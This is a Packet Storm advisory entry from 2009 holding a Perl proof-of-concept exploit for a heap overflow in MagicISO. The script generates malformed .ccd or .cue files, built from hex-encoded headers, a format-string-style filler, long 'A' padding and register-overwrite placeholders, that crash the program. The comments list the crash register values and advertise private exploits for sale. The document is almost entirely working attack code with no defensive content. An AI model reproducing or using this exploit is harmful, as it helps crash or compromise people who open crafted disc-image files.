MagicISO Heap Overflow

2009-04-16T00:00:00
ID PACKETSTORM:76758
Type packetstorm
Reporter Stack
Modified 2009-04-16T00:00:00

Description

                                        
                                            `#!/usr/bin/perl  
#  
# MagicISO CCD/Cue Local Heap Overflow Exploit Poc  
# ----------------------------------------------------------------  
# Mountassif Moad   
# Stack ..  
# Cyber-Zone ..   
#  
# Private exploits for Kayako, contact me if anyone want buy it :d  
#  
# WARNING: Author has no responsibility over the damage done  
# Probably impossible to exploit, but who knows? -_-'   
# Regiter for ccd  
# EAX 44444141  
# ECX 45459090  
# EDX 90904443  
# EBX 4545A094  
# ESP 0012F3A0  
# EBP 0012F3C4  
# ESI 013AE64C  
# EDI 013AF650  
# EIP 005C04CE MagicISO.005C04CE  
# Rgister for cue   
# EAX 0012F5D4  
# ECX 013B0000  
# EDX 013ADDFC ASCII "FILE "999Ax%N%N%N%N%N%N%N08495d565ef66e7dff9f98764daAAAAAAAAAAAAAA...."  
# EBX 00001241 EBc overwrited 41   
# ESP 0012F4D8  
# EBP 0012F4E4  
# ESI 00001200  
# EDI 00000000  
# EIP 0047FE91 MagicISO.0047FE91  
# Crash   
sub help {print "[!] usage : \n perl $0 .cpp \n perl $0 .cue \n " ;exit();}  
&help  
unless $ARGV[0];  
my $xpl = $ARGV[0];  
my $header =   
"\x5B\x43\x6C\x6F\x6E\x65\x43\x44\x5D\x0D\x0A\x56\x65\x72\x73\x69".  
"\x6F\x6E\x3D\x33\x0D\x0A\x5B\x44\x69\x73\x63\x5D\x0D\x0A\x54\x6F".  
"\x63\x45\x6E\x74\x72\x69\x65\x73\x3D\x34\x0D\x0A\x53\x65\x73\x73".  
"\x69\x6F\x6E\x73\x3D\x31\x0D\x0A\x44\x61\x74\x61\x54\x72\x61\x63".  
"\x6B\x73\x53\x63\x72\x61\x6D\x62\x6C\x65\x64\x3D\x30\x0D\x0A\x43".  
"\x44\x54\x65\x78\x74\x4C\x65\x6E\x67\x74\x68\x3D\x30\x0D\x0A\x5B".  
"\x53\x65\x73\x73\x69\x6F\x6E\x20\x31\x5D\x0D\x0A\x50\x72\x65\x47".  
"\x61\x70\x4D\x6F\x64\x65\x3D\x31\x0D\x0A\x50\x72\x65\x47\x61\x70".  
"\x53\x75\x62\x43\x3D\x30\x0D\x0A\x5B\x45\x6E\x74\x72\x79\x20\x30".  
"\x5D\x0D\x0A\x53\x65\x73\x73\x69\x6F\x6E\x3D\x31\x0D\x0A\x50\x6F".  
"\x69\x6E\x74\x3D\x30\x78\x61\x30\x0D\x0A\x41\x44\x52\x3D\x30\x78".  
"\x30\x31\x0D\x0A\x43\x6F\x6E\x74\x72\x6F\x6C\x3D\x30\x78\x30\x34".  
"\x0D\x0A\x54\x72\x61\x63\x6B\x4E\x6F\x3D\x30\x0D\x0A\x41\x4D\x69".  
"\x6E\x3D\x30\x0D\x0A\x41\x53\x65\x63\x3D\x30\x0D\x0A\x41\x46\x72".  
"\x61\x6D\x65\x3D\x30\x0D\x0A\x41\x4C\x42\x41\x3D\x2D\x31\x35\x30".  
"\x0D\x0A\x5A\x65\x72\x6F\x3D\x30\x0D\x0A\x50\x4D\x69\x6E\x3D\x31".  
"\x0D\x0A\x50\x53\x65\x63\x3D\x30\x0D\x0A\x50\x46\x72\x61\x6D\x65".  
"\x3D\x30\x0D\x0A\x50\x4C\x42\x41\x3D\x34\x33\x35\x30\x0D\x0A\x5B".  
"\x45\x6E\x74\x72\x79\x20\x31\x5D\x0D\x0A\x53\x65\x73\x73\x69\x6F".  
"\x6E\x3D\x31\x0D\x0A\x50\x6F\x69\x6E\x74\x3D\x30\x78\x61\x31\x0D".  
"\x0A\x41\x44\x52\x3D\x30\x78\x30\x31\x0D\x0A\x43\x6F\x6E\x74\x72".  
"\x6F\x6C\x3D\x30\x78\x30\x34\x0D\x0A\x54\x72\x61\x63\x6B\x4E\x6F".  
"\x3D\x30\x0D\x0A\x41\x4D\x69\x6E\x3D\x30\x0D\x0A\x41\x53\x65\x63".  
"\x3D\x30\x0D\x0A\x41\x46\x72\x61\x6D\x65\x3D\x30\x0D\x0A\x41\x4C".  
"\x42\x41\x3D\x2D\x31\x35\x30\x0D\x0A\x5A\x65\x72\x6F\x3D\x30\x0D".  
"\x0A\x50\x4D\x69\x6E\x3D\x31\x0D\x0A\x50\x53\x65\x63\x3D\x30\x0D".  
"\x0A\x50\x46\x72\x61\x6D\x65\x3D\x30\x0D\x0A\x50\x4C\x42\x41\x3D".  
"\x34\x33\x35\x30\x0D\x0A\x5B\x45\x6E\x74\x72\x79\x20\x32\x5D\x0D".  
"\x0A\x53\x65\x73\x73\x69\x6F\x6E\x3D\x31\x0D\x0A\x50\x6F\x69\x6E".  
"\x74\x3D\x30\x78\x61\x32\x0D\x0A\x41\x44\x52\x3D\x30\x78\x30\x31".  
"\x0D\x0A\x43\x6F\x6E\x74\x72\x6F\x6C\x3D\x30\x78\x30\x34\x0D\x0A".  
"\x54\x72\x61\x63\x6B\x4E\x6F\x3D\x30\x0D\x0A\x41\x4D\x69\x6E\x3D".  
"\x30\x0D\x0A\x41\x53\x65\x63\x3D\x30\x0D\x0A\x41\x46\x72\x61\x6D".  
"\x65\x3D\x30\x0D\x0A\x41\x4C\x42\x41\x3D\x2D\x31\x35\x30\x0D\x0A".  
"\x5A\x65\x72\x6F\x3D\x30\x0D\x0A\x50\x4D\x69\x6E\x3D\x30\x0D\x0A".  
"\x50\x53\x65\x63\x3D\x32\x0D\x0A\x50\x46\x72\x61\x6D\x65\x3D\x33".  
"\x34\x0D\x0A\x50\x4C\x42\x41\x3D\x33\x34\x0D\x0A\x5B\x45\x6E\x74".  
"\x72\x79\x20\x33\x5D\x0D\x0A\x53\x65\x73\x73\x69\x6F\x6E\x3D\x31".  
"\x0D\x0A\x50\x6F\x69\x6E\x74\x3D\x30\x78\x30\x31\x0D\x0A\x41\x44".  
"\x52\x3D\x30\x78\x30\x31\x0D\x0A\x43\x6F\x6E\x74\x72\x6F\x6C\x3D".  
"\x30\x78\x30\x34\x0D\x0A\x54\x72\x61\x63\x6B\x4E\x6F\x3D\x30\x0D".  
"\x0A\x41\x4D\x69\x6E\x3D\x30\x0D\x0A\x41\x53\x65\x63\x3D\x30\x0D".  
"\x0A\x41\x46\x72\x61\x6D\x65\x3D\x30\x0D\x0A\x41\x4C\x42\x41\x3D".  
"\x2D\x31\x35\x30\x0D\x0A\x5A\x65\x72\x6F\x3D\x30\x0D\x0A\x50\x4D".  
"\x69\x6E\x3D\x30\x0D\x0A\x50\x53\x65\x63\x3D\x32\x0D\x0A\x50\x46".  
"\x72\x61\x6D\x65\x3D\x30\x0D\x0A\x50\x4C\x42\x41\x3D\x30\x0D\x0A".  
"\x5B\x54\x52\x41\x43\x4B\x20\x31\x5D\x0D\x0A\x4D\x4F\x44\x45\x3D".  
"\x31\x0D\x0A\x49\x4E\x44\x45\x58\x20\x31\x3D\x39\x39\x39";  
  
  
my $header1=   
"\x46\x49\x4c\x45\x20\x22";  
my $header2=  
"\x2e\x42\x49\x4e\x22\x20\x42\x49\x4e\x41\x52\x59\x0d\x0a\x20".  
"\x54\x52\x41\x43\x4b\x20\x30\x31\x20\x4d\x4f\x44\x45\x31\x2f\x32".  
"\x33\x35\x32\x0d\x0a\x20\x20\x20\x49\x4e\x44\x45\x58\x20\x30\x31".  
"\x20\x30\x30\x3a\x30\x30\x3a\x30\x30";  
  
my $bypass=  
"\x39\x39\x39\x41\x78\x25\x4e\x25\x4e\x25\x4e\x25\x4e\x25\x4e\x25".  
"\x4e\x25\x4e\x25\x4e\x25\x4e\x25\x4e\x25\x4e\x25\x25\x4e\x25\x4e".  
"\x25\x4e\x25\x4e\x41\x63\x66\x63\x64\x32\x30\x38\x34\x39\x35\x64".  
"\x35\x36\x35\x65\x66\x36\x36\x65\x37\x64\x66\x66\x39\x66\x39\x38".  
"\x37\x36\x34\x64\x61\x63\x34\x63\x61\x34\x32\x33\x38\x61\x30";  
my $edx = "\x43\x43\x43\x43";  
my $Bof = "\x41" x 4004;  
my $eax = "\x44\x44\x44\x44";  
my $Nop = "\x90" x 4;  
my $ecx = "\x45\x45\x45\x45";  
my $Sop = "\x91" x 20;  
my $Hof = "\x46" x 5000;  
  
if ($xpl eq '.ccd')  
{open(file,'>Exploit.ccd');print file $header.$bypass.$edx.$Bof.$eax.$Nop.$ecx.$Sop.$Hof;close(file);print "[!] Done \n";}  
elsif ($xpl eq '.cue')  
{open(file,'>Exploit.cue');print file $header1.$bypass.$edx.$Bof.$eax.$Nop.$ecx.$Sop.$Hof.$header2;close(file);print "[!] Done \n"}  
else {&help}  
  
`